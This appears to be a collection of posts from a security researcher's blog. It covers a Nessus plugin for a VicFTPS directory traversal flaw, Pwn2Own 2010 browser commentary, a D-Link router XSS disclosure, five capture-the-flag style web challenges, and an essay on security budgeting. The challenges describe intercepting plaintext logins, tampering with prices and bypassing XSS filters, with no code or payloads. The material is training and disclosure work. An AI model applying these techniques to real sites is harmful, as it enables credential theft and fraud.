Nessus Plugin for VicFTPS Vulnerability

Wrote a Nessus Plugin to test on the VicFTPS Directory Traversal Vulnerability, that was discovered by chr1x (member of our sectester team).

This plugin will exploited the directory traversal vulnerability and return results if successful. I will be sending it to Nessus to get it added into the Plugin Feeds to be share with everyone. You can download the plugin here.

-Test with NASL Interpreter


- Added the Plugin


-Result from a scan


References:
- SecurityFocus: VicFTPS Directory Traversal Vulnerability

The Pwn2Own 2010 Contest

The Pwn2Own 2010 organized by DVlabs was over. But there are some interesting information to share.
(Extract from "10 Lessons From The Pwn2Own Hacker Contest")


Google Chrome the Most Secured?

"The only browser that survived Pwn2Own this year was Google Chrome. This led to numerous news reports like this one suggesting that Google's browser was somehow more secure than the others. This is far from the truth. In fact, the vulnerability that caused the iPhone's downfall was in the WebKit engine and also affected the Google Chrome browser. Chrome's sandbox was also held up as a major CanSecWest roadblock but there's already scuttlebutt circulating that at least two security researchers have found a way to break out of the Chrome sandbox. Keep in mind that the iPhone has a sandbox that didn't help much when hackers hijacked the SMS database at Pwn2Own.

Survival at the Pwn2Own contest simply means that researchers weren't motivated enough to give up their vulnerabilities/exploits in exchange for a smartphone and cash prizes. The iPhone survived in 2008, didn't it?"


IE 8 seems to be Most Protected Browser.

"Despite the survival of Google Chrome and the fall of Internet Explorer 8 (running on Windows 7), all the browser hackers at the contest maintained that Microsoft's browser is by far the most difficult to exploit. For starters, IE 8 is the only browser to fully -- and properly -- implement ASLR. Peter Vreugdenhil, the researcher behind the successful IE 8 hack, needed two different vulnerabilities and several exploitation tricks to get it to work. However, because IE is the world's most widely deployed browser, it will continue to attract the attention of hackers and malware writers. Security doesn't equate to safety."


Apple Safari still the Easiest to Hack?

"For the third year in a row, security researcher Charlie Miller successfully compromised a fully patched MacBook Pro machine with a Safari vulnerability and exploit. Despite Apple's best efforts at making it difficult to exploit the Mac OS X, Miller's exploits show that Safari is still easy pickings because it lacks the mitigations found in Microsoft Windows. For example, Safari does not implement ASLR properly and does not have a sandbox to limit the damage from a hacker attack."

D-Link Router XSS vulnerability found by w01f Labs

I have discover a Cross site Scripting (XSS) vulnerability on my own D-Link Router while working on fuzzing and vulnerability research last week. This vulnerability allows injecting of arbitrary HTML and malicious script code in the user's browser session.

Discovered Date: May 14, 2010
System affected: D-Link DI-724P+ Router, Firmware Version: v1.03

For more detail on this vulnerability, visit my research site - w01f Labs

Other References:
- SecurityFocus: D-Link DI-724P+ Router 'wlap.htm' HTML Injection Vulnerability
- OSVDB 65002 : D-Link DI-724P+ Admin Interface wlap.htm GET String XSS
- SANS: @RISK: The Consensus Security Vulnerability Alert

Web Security Challenge Revealed

I had created a series of Security Challenge for my Sectester team several months back. It was for the team to learn and share our knowledge.

The first challenge is on "Script Obfuscation".



Description:
Code obfuscation are commonly used by malware writer to bypass Anti Virus detection and reverse engineering. Many Obfuscated javascript were injected into innocent websites to run exploits and shellcodes to compromised systems. Others using "Drive by download" techniques to download malicious malware.

Objective:
With this challenge, you will learn the basic of analysing a script from a webpage. I have recommended some basic tools (under the technical resources) for beginners to pick up the fundamental of script analysis. There are many tools and ways you can analysed a script/code. You may find some useful tools in the Internet.

Environment:
The challenge was created with simple HTML and some javascript.
The URL: Email me if you interested

Rules:
* No particular rules. It is a code challenge, crack the code not the server.

Technical resources:
http://en.wikipedia.org/wiki/Obfuscated_code
- Some readup on code obfuscation

http://noscript.net/
- Useful tools to stop scripts on webpage before you start analysing them

http://getfirebug.com/
- Useful tool to inspect and debug scripts running on a webpage

Some real malicious obfuscated javascript from my research blog. http://labs-werew01f.sectester.net/

Feel free to provide comments on this challenge.

Web Security Challenge 2

The Web Security Challenge on "Encoding attacks for Web applications".



Description:
Web application commonly uses "GET" method to send user request to the webserver. They are commonly used for search, query and for bookmarking. The data in these requests can be easily extracted and manipulated from the address bar.

Objective:
This challenge is a very simple challenge. You are required to extract the "password" from the simulated user login and verify the capture password by logging in with it. For this challenge, You will learn and understand on how application uses "GET" method to send request to the server. This will be the fundamental for further challenges on code injection. You don't really require any tools to complete this challenge.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you interested

Rules:
* Do not extract the password from the source code. You are suppose to extract it from the request.
* It is a code challenge, extract the data not crack the server.

Technical resources:
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
- Some readup on HTTP and Request methods

Feel free to give comments on the challenge.

Web Security Challenge 3

Another challenge on "Encoding attacks for Web applications".



Description:
Many web sites do not use SSL encryption for their web application (including login pages). You can easily extract or manipulate data during the communication between the client and the server.

Objective:
This challenge is a simple challenge. You are required to extract the "password" from the simulated user login and verify the capture password by logging in with it. For this challenge, You will learn and understand on how to capture web communication between the client and the server. This will be the fundamental for further challenges on code injection.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you interested

Rules:
* Do not extract the password from the source code. You are suppose to extract it from the communication.
* It is a code challenge, extract the data not crack the server.

Technical resources:
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
- Some readup on HTTP and Request methods

http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- WebScarab, a good tool by OWASP

http://www.parosproxy.org/
- Another good web security tools

- Previously did a video on extracting user's credential on unsecured website
http://werew01f.blogspot.com/2009/05/how-secure-is-your-forum-login.html

Feel free to provide comments on this challenge.

Web Security Challenge 4

Web Security Challenge on "Data Manipulation attacks for Web applications".



Description:
Many web sites do not use SSL encryption for their web application (including login pages). You can easily extract or manipulate data during the communication between the client and server. Some web application does their computation on the client system and submit back to the server. One of my first few hack was changing my score in the online games many years back.

Objective:
This challenge is a simple challenge. You are required to change the price of a online shopping item to $2. For this challenge, You will learn to manipulate data send between the client and the server. This will be the fundamental for further challenges on code injection.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you interested

Rules:
* Do not change the source code. You are suppose to manipulate it during the communication.
* It is a code challenge, manipulate the data not crack the server.

Technical resources:
http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- WebScarab, a good tool by OWASP

http://www.parosproxy.org/
- Another good web security tools

Feel free to provide comments on this challenge.

Web Security Challenge 5

Web Security Challenge on "XSS attacks for Web applications".



Description:
Many web sites these days are prone to XSS (Cross Site Scripting) attacks. Some web applications uses simple XSS filters to protect against XSS attack. But there are many ways to bypass those filters.

Objective:
This challenge is a simple XSS challenge. You are required to inject a simple alert to display "sectester rocks". For this challenge, You will learn to launch XSS attack and bypass simple XSS filters. This will be the fundamental for tougher challenge in future.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you interested

Rules:
* Do not change the source code. You are suppose to inject script.
* It is a code challenge, manipulate the data not crack the server.

Technical resources:
http://en.wikipedia.org/wiki/Cross-site_scripting
- Basic on Cross Site Scripting

Feel free to provide comments on this challenge.

Most Secured VS Cost Effective Security

Have an interesting discussion recently with krag Brotby (editor of the official ISACA CISM review Manual) regarding setting a high baseline and achieving Zero incident. It triggers the thought of Most secured VS Cost effective security.

In Security, most practitioners will try to set a high baseline to achieve zero incident. Getting various security products to protect all possible threats. Many of the times, standard security controls such as Firewall, Anti Virus, etc, were handling 95% of the incidents with about 20% of the total security expenses. The more sophisticated products and solutions such as SIEM, handles the remaining 5% but uses 50% of your total expenses and resource.

Instead of spending so much to handle the minority threats, they can sometime be manage by having a incident handling process to handle the 5% of incidents (which maybe 3 to 5 incidents per year). Majority of the budget and resource could be saved or for better use. It definitely is a good value proposition that will appeals to the management (especially during the economy downturn).

By having zero incident may also have "negative" impact to the management and staff. Management may be too comfortable with the security level and may not increase or may even cut future budget. Security staff may also be complacent on maintaining and improving the current security.

As new security issues emerge constantly, your current security controls will never be enough to maintain zero incident for your organization forever. New threats will be discovered. Additional budget and controls would be needed. Having a few incidents per year could be useful to keep the management and security staff on their toes. Management may also be more acceptable with new threats and staffs are more reactive to new security challenges.